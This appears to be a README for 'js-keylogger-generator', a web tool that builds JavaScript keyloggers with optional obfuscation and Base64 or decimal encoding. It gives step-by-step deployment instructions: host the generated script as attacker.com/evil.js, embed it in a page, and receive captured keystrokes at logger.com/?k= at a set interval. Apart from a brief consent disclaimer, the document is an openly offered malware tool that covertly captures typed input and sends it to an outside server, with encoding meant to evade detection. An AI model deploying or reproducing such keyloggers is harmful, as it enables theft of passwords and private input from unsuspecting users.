"js-keylogger-generator" is a web application that generates a customizable keylogger script based on user inputs. Users can specify the URL where the captured keystrokes will be sent, as well as the time interval for sending the data. The generated script supports most keyboard characters and also includes special keys such as Backspace, Tab, Enter, Shift, Ctrl, Alt, Esc, Delete, and Caps Lock.
The tool currently supports US QWERTY keyboard layout, but it can be easily extended to support other keyboard layouts by modifying the source code. The generated script can also be obfuscated and encoded in various formats.
- None
- Obfuscated
- Base64 Encoded
- Base64 Encoded + Obfuscated
- Decimal Encoded
- Decimal Encoded + Obfuscated
Please use this tool only for legal and ethical purposes, and with the explicit and informed consent of the users whose keystrokes you are logging. By using this tool, you assume all legal and ethical responsibilities for your actions, and agree to use it in compliance with all applicable laws, regulations, and ethical standards. You acknowledge that any unauthorized use of this tool is strictly prohibited, and that you are solely responsible for any consequences that may arise from such use.
- Go to: https://selmankon.github.io/js-keylogger-generator/
- Fill in the necessary information in the form, including the URL
Example: https://logger.com/?k=
for the keylogger script and the interval timeout (in milliseconds). - Choose whether to encode or obfuscate the generated keylogger script, and select the appropriate options.
- Click the "Generate" button to create the keylogger script.
- Copy the generated script and paste it into a new JavaScript file in your logger website.
(Example: https://attacker.com/evil.js)
- Add the keylogger script to your web page.
Example: attacker.com includes <script src="https://attacker.com/evil.js">
- Launch the web page
(in this case is attacker.com)
and start typing. The keylogger will begin logging your keystrokes and sending them to the specified URL(in this case is logger.com)
at the specified interval.
You can easily use:
python3 -m http.server 9090
- Create and copy the keylogging script. Paste this into the script.js file on your attacker website.
- Go to the website that added the keylogger script. Send some keystrokes. (script.js is the generated script)
- Logs started to appear on the logger server at the "Source URL" you filled in the form.